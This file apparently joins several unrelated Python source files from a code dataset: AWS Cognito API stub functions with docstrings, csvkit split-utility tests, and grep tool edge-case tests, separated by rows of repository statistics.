def resend_confirmation_code(ClientId=None, SecretHash=None, Username=None):
"""
Resends the confirmation (for confirmation of registration) to a specific user in the user pool.
See also: AWS API Documentation
:example: response = client.resend_confirmation_code(
ClientId='string',
SecretHash='string',
Username='string'
)
:type ClientId: string
:param ClientId: [REQUIRED]
The ID of the client associated with the user pool.
:type SecretHash: string
:param SecretHash: A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type Username: string
:param Username: [REQUIRED]
The user name of the user to whom you wish to resend a confirmation code.
:rtype: dict
:return: {
'CodeDeliveryDetails': {
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
}
}
"""
pass
def respond_to_auth_challenge(ClientId=None, ChallengeName=None, Session=None, ChallengeResponses=None):
"""
Responds to the authentication challenge.
See also: AWS API Documentation
:example: response = client.respond_to_auth_challenge(
ClientId='string',
ChallengeName='SMS_MFA'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
Session='string',
ChallengeResponses={
'string': 'string'
}
)
:type ClientId: string
:param ClientId: [REQUIRED]
The app client ID.
:type ChallengeName: string
:param ChallengeName: [REQUIRED]
The challenge name. For more information, see InitiateAuth .
ADMIN_NO_SRP_AUTH is not a valid value.
:type Session: string
:param Session: The session which should be passed both ways in challenge-response calls to the service. If InitiateAuth or RespondToAuthChallenge API call determines that the caller needs to go through another challenge, they return a session with other challenge parameters. This session should be passed as it is to the next RespondToAuthChallenge API call.
:type ChallengeResponses: dict
:param ChallengeResponses: The challenge responses. These are inputs corresponding to the value of ChallengeName , for example:
SMS_MFA : SMS_MFA_CODE , USERNAME , SECRET_HASH (if app client is configured with client secret).
PASSWORD_VERIFIER : PASSWORD_CLAIM_SIGNATURE , PASSWORD_CLAIM_SECRET_BLOCK , TIMESTAMP , USERNAME , SECRET_HASH (if app client is configured with client secret).
NEW_PASSWORD_REQUIRED : NEW_PASSWORD , any other required attributes, USERNAME , SECRET_HASH (if app client is configured with client secret).
(string) --
(string) --
:rtype: dict
:return: {
'ChallengeName': 'SMS_MFA'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
'Session': 'string',
'ChallengeParameters': {
'string': 'string'
},
'AuthenticationResult': {
'AccessToken': 'string',
'ExpiresIn': 123,
'TokenType': 'string',
'RefreshToken': 'string',
'IdToken': 'string',
'NewDeviceMetadata': {
'DeviceKey': 'string',
'DeviceGroupKey': 'string'
}
}
}
:returns:
(string) --
(string) --
"""
pass
def set_user_settings(AccessToken=None, MFAOptions=None):
"""
Sets the user settings like multi-factor authentication (MFA). If MFA is to be removed for a particular attribute pass the attribute with code delivery as null. If null list is passed, all MFA options are removed.
See also: AWS API Documentation
:example: response = client.set_user_settings(
AccessToken='string',
MFAOptions=[
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token for the set user settings request.
:type MFAOptions: list
:param MFAOptions: [REQUIRED]
Specifies the options for MFA (e.g., email or phone number).
(dict) --Specifies the different settings for multi-factor authentication (MFA).
DeliveryMedium (string) --The delivery medium (email message or SMS message) to send the MFA code.
AttributeName (string) --The attribute name of the MFA option type.
:rtype: dict
:return: {}
"""
pass
def sign_up(ClientId=None, SecretHash=None, Username=None, Password=None, UserAttributes=None, ValidationData=None):
"""
Registers the user in the specified user pool and creates a user name, password, and user attributes.
See also: AWS API Documentation
:example: response = client.sign_up(
ClientId='string',
SecretHash='string',
Username='string',
Password='string',
UserAttributes=[
{
'Name': 'string',
'Value': 'string'
},
],
ValidationData=[
{
'Name': 'string',
'Value': 'string'
},
]
)
:type ClientId: string
:param ClientId: [REQUIRED]
The ID of the client associated with the user pool.
:type SecretHash: string
:param SecretHash: A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type Username: string
:param Username: [REQUIRED]
The user name of the user you wish to register.
:type Password: string
:param Password: [REQUIRED]
The password of the user you wish to register.
:type UserAttributes: list
:param UserAttributes: An array of name-value pairs representing user attributes.
For custom attributes, you must prepend the custom: prefix to the attribute name.
(dict) --Specifies whether the attribute is standard or custom.
Name (string) -- [REQUIRED]The name of the attribute.
Value (string) --The value of the attribute.
:type ValidationData: list
:param ValidationData: The validation data in the request to register a user.
(dict) --Specifies whether the attribute is standard or custom.
Name (string) -- [REQUIRED]The name of the attribute.
Value (string) --The value of the attribute.
:rtype: dict
:return: {
'UserConfirmed': True|False,
'CodeDeliveryDetails': {
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
'UserSub': 'string'
}
"""
pass
def start_user_import_job(UserPoolId=None, JobId=None):
"""
Starts the user import.
See also: AWS API Documentation
:example: response = client.start_user_import_job(
UserPoolId='string',
JobId='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool that the users are being imported into.
:type JobId: string
:param JobId: [REQUIRED]
The job ID for the user import job.
:rtype: dict
:return: {
'UserImportJob': {
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
}
}
:returns:
Created - The job was created but not started.
Pending - A transition state. You have started the job, but it has not begun importing users yet.
InProgress - The job has started, and users are being imported.
Stopping - You have stopped the job, but the job has not stopped importing users yet.
Stopped - You have stopped the job, and the job has stopped importing users.
Succeeded - The job has completed successfully.
Failed - The job has stopped due to an error.
Expired - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
"""
pass
def stop_user_import_job(UserPoolId=None, JobId=None):
"""
Stops the user import job.
See also: AWS API Documentation
:example: response = client.stop_user_import_job(
UserPoolId='string',
JobId='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool that the users are being imported into.
:type JobId: string
:param JobId: [REQUIRED]
The job ID for the user import job.
:rtype: dict
:return: {
'UserImportJob': {
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
}
}
:returns:
Created - The job was created but not started.
Pending - A transition state. You have started the job, but it has not begun importing users yet.
InProgress - The job has started, and users are being imported.
Stopping - You have stopped the job, but the job has not stopped importing users yet.
Stopped - You have stopped the job, and the job has stopped importing users.
Succeeded - The job has completed successfully.
Failed - The job has stopped due to an error.
Expired - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
"""
pass
def update_device_status(AccessToken=None, DeviceKey=None, DeviceRememberedStatus=None):
"""
Updates the device status.
See also: AWS API Documentation
:example: response = client.update_device_status(
AccessToken='string',
DeviceKey='string',
DeviceRememberedStatus='remembered'|'not_remembered'
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token.
:type DeviceKey: string
:param DeviceKey: [REQUIRED]
The device key.
:type DeviceRememberedStatus: string
:param DeviceRememberedStatus: The status of whether a device is remembered.
:rtype: dict
:return: {}
"""
pass
def update_group(GroupName=None, UserPoolId=None, Description=None, RoleArn=None, Precedence=None):
"""
Updates the specified group with the specified attributes.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.update_group(
GroupName='string',
UserPoolId='string',
Description='string',
RoleArn='string',
Precedence=123
)
:type GroupName: string
:param GroupName: [REQUIRED]
The name of the group.
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool.
:type Description: string
:param Description: A string containing the new description of the group.
:type RoleArn: string
:param RoleArn: The new role ARN for the group. This is used for setting the cognito:roles and cognito:preferred_role claims in the token.
:type Precedence: integer
:param Precedence: The new precedence value for the group. For more information about this parameter, see CreateGroup .
:rtype: dict
:return: {
'Group': {
'GroupName': 'string',
'UserPoolId': 'string',
'Description': 'string',
'RoleArn': 'string',
'Precedence': 123,
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
"""
pass
def update_identity_provider(UserPoolId=None, ProviderName=None, ProviderDetails=None, AttributeMapping=None, IdpIdentifiers=None):
"""
Updates identity provider information for a user pool.
See also: AWS API Documentation
:example: response = client.update_identity_provider(
UserPoolId='string',
ProviderName='string',
ProviderDetails={
'string': 'string'
},
AttributeMapping={
'string': 'string'
},
IdpIdentifiers=[
'string',
]
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:type ProviderName: string
:param ProviderName: [REQUIRED]
The identity provider name.
:type ProviderDetails: dict
:param ProviderDetails: The identity provider details to be updated, such as MetadataURL and MetadataFile .
(string) --
(string) --
:type AttributeMapping: dict
:param AttributeMapping: The identity provider attribute mapping to be changed.
(string) --
(string) --
:type IdpIdentifiers: list
:param IdpIdentifiers: A list of identity provider identifiers.
(string) --
:rtype: dict
:return: {
'IdentityProvider': {
'UserPoolId': 'string',
'ProviderName': 'string',
'ProviderType': 'SAML',
'ProviderDetails': {
'string': 'string'
},
'AttributeMapping': {
'string': 'string'
},
'IdpIdentifiers': [
'string',
],
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
:returns:
(string) --
(string) --
"""
pass
def update_user_attributes(UserAttributes=None, AccessToken=None):
"""
Allows a user to update a specific attribute (one at a time).
See also: AWS API Documentation
:example: response = client.update_user_attributes(
UserAttributes=[
{
'Name': 'string',
'Value': 'string'
},
],
AccessToken='string'
)
:type UserAttributes: list
:param UserAttributes: [REQUIRED]
An array of name-value pairs representing user attributes.
For custom attributes, you must prepend the custom: prefix to the attribute name.
(dict) --Specifies whether the attribute is standard or custom.
Name (string) -- [REQUIRED]The name of the attribute.
Value (string) --The value of the attribute.
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token for the request to update user attributes.
:rtype: dict
:return: {
'CodeDeliveryDetailsList': [
{
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
}
"""
pass
def update_user_pool(UserPoolId=None, Policies=None, LambdaConfig=None, AutoVerifiedAttributes=None, SmsVerificationMessage=None, EmailVerificationMessage=None, EmailVerificationSubject=None, SmsAuthenticationMessage=None, MfaConfiguration=None, DeviceConfiguration=None, EmailConfiguration=None, SmsConfiguration=None, UserPoolTags=None, AdminCreateUserConfig=None):
"""
Updates the specified user pool with the specified attributes.
See also: AWS API Documentation
:example: response = client.update_user_pool(
UserPoolId='string',
Policies={
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
LambdaConfig={
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string'
},
AutoVerifiedAttributes=[
'phone_number'|'email',
],
SmsVerificationMessage='string',
EmailVerificationMessage='string',
EmailVerificationSubject='string',
SmsAuthenticationMessage='string',
MfaConfiguration='OFF'|'ON'|'OPTIONAL',
DeviceConfiguration={
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
EmailConfiguration={
'SourceArn': 'string',
'ReplyToEmailAddress': 'string'
},
SmsConfiguration={
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
UserPoolTags={
'string': 'string'
},
AdminCreateUserConfig={
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
}
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool you want to update.
:type Policies: dict
:param Policies: A container with the policies you wish to update in a user pool.
PasswordPolicy (dict) --A container for information about the user pool password policy.
MinimumLength (integer) --The minimum length of the password policy that you have set. Cannot be less than 6.
RequireUppercase (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
RequireLowercase (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
RequireNumbers (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
RequireSymbols (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
:type LambdaConfig: dict
:param LambdaConfig: The AWS Lambda configuration information from the request to update the user pool.
PreSignUp (string) --A pre-registration AWS Lambda trigger.
CustomMessage (string) --A custom Message AWS Lambda trigger.
PostConfirmation (string) --A post-confirmation AWS Lambda trigger.
PreAuthentication (string) --A pre-authentication AWS Lambda trigger.
PostAuthentication (string) --A post-authentication AWS Lambda trigger.
DefineAuthChallenge (string) --Defines the authentication challenge.
CreateAuthChallenge (string) --Creates an authentication challenge.
VerifyAuthChallengeResponse (string) --Verifies the authentication challenge response.
:type AutoVerifiedAttributes: list
:param AutoVerifiedAttributes: The attributes that are automatically verified when the Amazon Cognito service makes a request to update user pools.
(string) --
:type SmsVerificationMessage: string
:param SmsVerificationMessage: A container with information about the SMS verification message.
:type EmailVerificationMessage: string
:param EmailVerificationMessage: The contents of the email verification message.
:type EmailVerificationSubject: string
:param EmailVerificationSubject: The subject of the email verification message.
:type SmsAuthenticationMessage: string
:param SmsAuthenticationMessage: The contents of the SMS authentication message.
:type MfaConfiguration: string
:param MfaConfiguration: Can be one of the following values:
OFF - MFA tokens are not required and cannot be specified during user registration.
ON - MFA tokens are required for all user registrations. You can only specify required when you are initially creating a user pool.
OPTIONAL - Users have the option when registering to create an MFA token.
:type DeviceConfiguration: dict
:param DeviceConfiguration: Device configuration.
ChallengeRequiredOnNewDevice (boolean) --Indicates whether a challenge is required on a new device. Only applicable to a new device.
DeviceOnlyRememberedOnUserPrompt (boolean) --If true, a device is only remembered on user prompt.
:type EmailConfiguration: dict
:param EmailConfiguration: Email configuration.
SourceArn (string) --The Amazon Resource Name (ARN) of the email source.
ReplyToEmailAddress (string) --The REPLY-TO email address.
:type SmsConfiguration: dict
:param SmsConfiguration: SMS configuration.
SnsCallerArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
ExternalId (string) --The external ID.
:type UserPoolTags: dict
:param UserPoolTags: The cost allocation tags for the user pool. For more information, see Adding Cost Allocation Tags to Your User Pool
(string) --
(string) --
:type AdminCreateUserConfig: dict
:param AdminCreateUserConfig: The configuration for AdminCreateUser requests.
AllowAdminCreateUserOnly (boolean) --Set to True if only the administrator is allowed to create user profiles. Set to False if users can sign themselves up via an app.
UnusedAccountValidityDays (integer) --The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call AdminCreateUser again, specifying 'RESEND' for the MessageAction parameter. The default value for this parameter is 7.
InviteMessageTemplate (dict) --The message template to be used for the welcome message to new users.
SMSMessage (string) --The message template for SMS messages.
EmailMessage (string) --The message template for email messages.
EmailSubject (string) --The subject line for email messages.
:rtype: dict
:return: {}
"""
pass
def update_user_pool_client(UserPoolId=None, ClientId=None, ClientName=None, RefreshTokenValidity=None, ReadAttributes=None, WriteAttributes=None, ExplicitAuthFlows=None, SupportedIdentityProviders=None, CallbackURLs=None, LogoutURLs=None, DefaultRedirectURI=None, AllowedOAuthFlows=None, AllowedOAuthScopes=None, AllowedOAuthFlowsUserPoolClient=None):
"""
Allows the developer to update the specified user pool client and password policy.
See also: AWS API Documentation
:example: response = client.update_user_pool_client(
UserPoolId='string',
ClientId='string',
ClientName='string',
RefreshTokenValidity=123,
ReadAttributes=[
'string',
],
WriteAttributes=[
'string',
],
ExplicitAuthFlows=[
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY',
],
SupportedIdentityProviders=[
'string',
],
CallbackURLs=[
'string',
],
LogoutURLs=[
'string',
],
DefaultRedirectURI='string',
AllowedOAuthFlows=[
'code'|'implicit'|'client_credentials',
],
AllowedOAuthScopes=[
'string',
],
AllowedOAuthFlowsUserPoolClient=True|False
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to update the user pool client.
:type ClientId: string
:param ClientId: [REQUIRED]
The ID of the client associated with the user pool.
:type ClientName: string
:param ClientName: The client name from the update user pool client request.
:type RefreshTokenValidity: integer
:param RefreshTokenValidity: The time limit, in days, after which the refresh token is no longer valid and cannot be used.
:type ReadAttributes: list
:param ReadAttributes: The read-only attributes of the user pool.
(string) --
:type WriteAttributes: list
:param WriteAttributes: The writeable attributes of the user pool.
(string) --
:type ExplicitAuthFlows: list
:param ExplicitAuthFlows: Explicit authentication flows.
(string) --
:type SupportedIdentityProviders: list
:param SupportedIdentityProviders: A list of provider names for the identity providers that are supported on this client.
(string) --
:type CallbackURLs: list
:param CallbackURLs: A list of allowed callback URLs for the identity providers.
(string) --
:type LogoutURLs: list
:param LogoutURLs: A list ofallowed logout URLs for the identity providers.
(string) --
:type DefaultRedirectURI: string
:param DefaultRedirectURI: The default redirect URI. Must be in the CallbackURLs list.
:type AllowedOAuthFlows: list
:param AllowedOAuthFlows: Set to code to initiate a code grant flow, which provides an authorization code as the response. This code can be exchanged for access tokens with the token endpoint.
Set to token to specify that the client should get the access token (and, optionally, ID token, based on scopes) directly.
(string) --
:type AllowedOAuthScopes: list
:param AllowedOAuthScopes: A list of allowed OAuth scopes. Currently supported values are 'phone' , 'email' , 'openid' , and 'Cognito' .
(string) --
:type AllowedOAuthFlowsUserPoolClient: boolean
:param AllowedOAuthFlowsUserPoolClient: Set to TRUE if the client is allowed to follow the OAuth protocol when interacting with Cognito user pools.
:rtype: dict
:return: {
'UserPoolClient': {
'UserPoolId': 'string',
'ClientName': 'string',
'ClientId': 'string',
'ClientSecret': 'string',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'RefreshTokenValidity': 123,
'ReadAttributes': [
'string',
],
'WriteAttributes': [
'string',
],
'ExplicitAuthFlows': [
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY',
],
'SupportedIdentityProviders': [
'string',
],
'CallbackURLs': [
'string',
],
'LogoutURLs': [
'string',
],
'DefaultRedirectURI': 'string',
'AllowedOAuthFlows': [
'code'|'implicit'|'client_credentials',
],
'AllowedOAuthScopes': [
'string',
],
'AllowedOAuthFlowsUserPoolClient': True|False
}
}
:returns:
(string) --
"""
pass
def verify_user_attribute(AccessToken=None, AttributeName=None, Code=None):
"""
Verifies the specified user attributes in the user pool.
See also: AWS API Documentation
:example: response = client.verify_user_attribute(
AccessToken='string',
AttributeName='string',
Code='string'
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
Represents the access token of the request to verify user attributes.
:type AttributeName: string
:param AttributeName: [REQUIRED]
The attribute name in the request to verify user attributes.
:type Code: string
:param Code: [REQUIRED]
The verification code in the request to verify user attributes.
:rtype: dict
:return: {}
"""
pass
| 33.325024
| 625
| 0.60243
| 13,953
| 137,699
| 5.897585
| 0.062926
| 0.017864
| 0.015239
| 0.011691
| 0.820231
| 0.784989
| 0.757185
| 0.735469
| 0.716912
| 0.691259
| 0
| 0.006313
| 0.317795
| 137,699
| 4,131
| 626
| 33.333091
| 0.869671
| 0.833158
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.538462
| 0.032051
| 0
| 0.532051
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
329b29b0fee4c641e2cfc32de5e4769e6c60dc51
| 4,060
|
py
|
Python
|
tests/test_utilities/test_csvsplit.py
|
themiurgo/csvkit
|
d03fb24c9b35d6cac77881b71c794ff6274356a3
|
[
"MIT"
] | 2
|
2016-01-24T22:10:19.000Z
|
2017-01-10T10:43:13.000Z
|
tests/test_utilities/test_csvsplit.py
|
themiurgo/csvkit
|
d03fb24c9b35d6cac77881b71c794ff6274356a3
|
[
"MIT"
] | null | null | null |
tests/test_utilities/test_csvsplit.py
|
themiurgo/csvkit
|
d03fb24c9b35d6cac77881b71c794ff6274356a3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import StringIO
import unittest
from csvkit import CSVKitReader
from csvkit.utilities.csvsplit import CSVSplit, fname_format
class DummyFiles(object):
def __init__(self):
self.file_objs = {}
def dummy_file_constructor(self, fname, mode, *args, **kwargs):
fobj = StringIO.StringIO()
self.file_objs[fname] = fobj
return fobj
class TestCSVSplit(unittest.TestCase):
def test_fname(self):
output_fname = fname_format("data/population.projection.csv", "2009")
self.assertEqual(output_fname, "data/population.projection_2009.csv")
def test_explicit_splitting(self):
# Split a file in two files
args = ['-c', 'foo', 'examples/dummy-stacked.csv']
utility = CSVSplit(args)
dummy_files = DummyFiles()
utility.main(dummy_files.dummy_file_constructor)
print dummy_files.file_objs
input_file = StringIO.StringIO(dummy_files.file_objs['examples/dummy-stacked_asd.csv'].getvalue())
reader = CSVKitReader(input_file)
self.assertEqual(reader.next(), ['foo', 'a', 'b', 'c'])
self.assertEqual(reader.next(), ['asd', '1', '2', '3'])
self.assertEqual(reader.next(), ['asd', '4', '5', '6'])
input_file = StringIO.StringIO(dummy_files.file_objs['examples/dummy-stacked_sdf.csv'].getvalue())
reader = CSVKitReader(input_file)
self.assertEqual(reader.next(), ['foo', 'a', 'b', 'c'])
self.assertEqual(reader.next(), ['sdf', '1', '2', '3'])
self.assertEqual(reader.next(), ['sdf', '4', '5', '6'])
def test_no_header_row(self):
# Split a no header file in two files
args = ['-c', '1', '--no-header-row', 'examples/dummy-stacked.csv']
utility = CSVSplit(args)
dummy_files = DummyFiles()
utility.main(dummy_files.dummy_file_constructor)
print dummy_files.file_objs
input_file = StringIO.StringIO(dummy_files.file_objs['examples/dummy-stacked_foo.csv'].getvalue())
reader = CSVKitReader(input_file)
self.assertEqual(reader.next(), ['foo', 'a', 'b', 'c'])
input_file = StringIO.StringIO(dummy_files.file_objs['examples/dummy-stacked_asd.csv'].getvalue())
reader = CSVKitReader(input_file)
self.assertEqual(reader.next(), ['asd', '1', '2', '3'])
self.assertEqual(reader.next(), ['asd', '4', '5', '6'])
input_file = StringIO.StringIO(dummy_files.file_objs['examples/dummy-stacked_sdf.csv'].getvalue())
reader = CSVKitReader(input_file)
self.assertEqual(reader.next(), ['sdf', '1', '2', '3'])
self.assertEqual(reader.next(), ['sdf', '4', '5', '6'])
# def test_stdin(self):
# # Split a no file from stdin in two files
# args = ['-c', '1']
# utility = CSVSplit(args)
# dummy_files = DummyFiles()
# # assert that raises an error utility.main(dummy_files.dummy_file_constructor)
# #print dummy_files.file_objs
# # Split a no file from stdin in two files
# args = ['-c', '1' '-o' ['splitted.csv']]
# utility = CSVSplit(args)
# dummy_files = DummyFiles()
# assert that raises an error utility.main(dummy_files.dummy_file_constructor)
# input_file = StringIO.StringIO(dummy_files.file_objs[('examples/dummy-stacked_foo.csv')].getvalue())
# reader = CSVKitReader(input_file)
# self.assertEqual(reader.next(), ['foo', 'a', 'b', 'c'])
# input_file = StringIO.StringIO(dummy_files.file_objs[('examples/dummy-stacked_asd.csv')].getvalue())
# reader = CSVKitReader(input_file)
# self.assertEqual(reader.next(), ['asd', '1', '2', '3'])
# self.assertEqual(reader.next(), ['asd', '4', '5', '6'])
# input_file = StringIO.StringIO(dummy_files.file_objs[('examples/dummy-stacked_sdf.csv')].getvalue())
# reader = CSVKitReader(input_file)
# self.assertEqual(reader.next(), ['sdf', '1', '2', '3'])
# self.assertEqual(reader.next(), ['sdf', '4', '5', '6'])
| 41.428571
| 110
| 0.625369
| 496
| 4,060
| 4.953629
| 0.155242
| 0.07733
| 0.136752
| 0.1628
| 0.789174
| 0.789174
| 0.773301
| 0.77208
| 0.77208
| 0.77208
| 0
| 0.014614
| 0.207882
| 4,060
| 97
| 111
| 41.85567
| 0.749378
| 0.310837
| 0
| 0.583333
| 0
| 0
| 0.130105
| 0.096494
| 0
| 0
| 0
| 0
| 0.25
| 0
| null | null | 0
| 0.083333
| null | null | 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
32c7d89787386bcd601ca37279ebb900dce6021f
| 4,515
|
py
|
Python
|
tests/test_grep_edge_cases.py
|
florianbegusch/simple_grep
|
62fd0f76383e2332c5308e7961ce6f585c2a8208
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_grep_edge_cases.py
|
florianbegusch/simple_grep
|
62fd0f76383e2332c5308e7961ce6f585c2a8208
|
[
"BSD-2-Clause"
] | 2
|
2020-06-19T20:18:12.000Z
|
2020-06-19T20:18:50.000Z
|
tests/test_grep_edge_cases.py
|
florianbegusch/simple_grep
|
62fd0f76383e2332c5308e7961ce6f585c2a8208
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import platform
import pytest
from grep import print_helper
from grep import file_helper
from grep.grep import Searcher
from tests.helper_for_tests import *
def test_run_with_empty_str_not_regex_line_by_line(with_f_write):
with_f_write.write('docopt\nasdfwer')
with_f_write.seek(0)
caller_dir = os.path.dirname(with_f_write.name)
search_term = ''
is_regex_pattern = False
is_search_line_by_line = True
matched_files = Searcher.run(
Searcher(
caller_dir=caller_dir,
search_term=search_term,
specific_file='',
is_recursive=False,
is_abs_path=False,
is_regex_pattern=is_regex_pattern,
is_search_line_by_line=is_search_line_by_line,
is_from_stdin=False))
assert matched_files == [os.path.abspath(with_f_write.name)]
def test_run_with_empty_str_is_regex_line_by_line(with_f_write):
with_f_write.write('docopt\nasdfwer')
with_f_write.seek(0)
caller_dir = os.path.dirname(with_f_write.name)
search_term = ''
is_regex_pattern = True
is_search_line_by_line = True
matched_files = Searcher.run(
Searcher(
caller_dir=caller_dir,
search_term=search_term,
specific_file='',
is_recursive=False,
is_abs_path=False,
is_regex_pattern=is_regex_pattern,
is_search_line_by_line=is_search_line_by_line,
is_from_stdin=False))
assert matched_files == [os.path.abspath(with_f_write.name)]
def test_run_with_empty_str_not_regex_file_level(with_f_write):
with_f_write.write('docopt\nasdfwer')
with_f_write.seek(0)
caller_dir = os.path.dirname(with_f_write.name)
search_term = ""
is_regex_pattern = False
is_search_line_by_line = False
matched_files = Searcher.run(
Searcher(
caller_dir=caller_dir,
search_term=search_term,
specific_file='',
is_recursive=False,
is_abs_path=False,
is_regex_pattern=is_regex_pattern,
is_search_line_by_line=is_search_line_by_line,
is_from_stdin=False))
assert matched_files == [os.path.abspath(with_f_write.name)]
def test_run_with_empty_str_is_regex_file_level(with_f_write):
with_f_write.write('docopt\nasdfwer')
with_f_write.seek(0)
caller_dir = os.path.dirname(with_f_write.name)
search_term = ""
is_regex_pattern = True
is_search_line_by_line = False
matched_files = Searcher.run(
Searcher(
caller_dir=caller_dir,
search_term=search_term,
specific_file='',
is_recursive=False,
is_abs_path=False,
is_regex_pattern=is_regex_pattern,
is_search_line_by_line=is_search_line_by_line,
is_from_stdin=False))
assert matched_files == [os.path.abspath(with_f_write.name)]
@pytest.mark.skipif("platform.system() == 'Windows'")
def test_ioerror_due_to_restricted_file(with_restricted_file):
caller_dir = with_restricted_file
Searcher.run(
Searcher(
caller_dir=caller_dir,
search_term="",
specific_file='',
is_recursive=False,
is_abs_path=False,
is_regex_pattern=False,
is_search_line_by_line=True,
is_from_stdin=False))
def test_regular_expression_error_file_level(with_f_read):
search_term = "[\\]"
is_regex_pattern = True
is_search_line_by_line = False
f = with_f_read.name
Searcher.search_f(
Searcher(
caller_dir='',
specific_file='',
search_term=search_term,
is_recursive=False,
is_abs_path=False,
is_regex_pattern=is_regex_pattern,
is_search_line_by_line=is_search_line_by_line,
is_from_stdin=False), f)
def test_regular_expression_error_line_by_line(with_f_read):
search_term = "[\\]"
is_regex_pattern = True
is_search_line_by_line = True
f = with_f_read.name
# Directory option is irrelevant for the test.
Searcher.search_f(
Searcher(
caller_dir='',
search_term=search_term,
specific_file='',
is_recursive=False,
is_abs_path=False,
is_regex_pattern=is_regex_pattern,
is_search_line_by_line=is_search_line_by_line,
is_from_stdin=False), f)
| 29.129032
| 65
| 0.66268
| 615
| 4,515
| 4.364228
| 0.108943
| 0.044709
| 0.081967
| 0.099106
| 0.86699
| 0.831222
| 0.81073
| 0.81073
| 0.800298
| 0.786513
| 0
| 0.001494
| 0.258915
| 4,515
| 154
| 66
| 29.318182
| 0.800658
| 0.014618
| 0
| 0.836066
| 0
| 0
| 0.022042
| 0
| 0
| 0
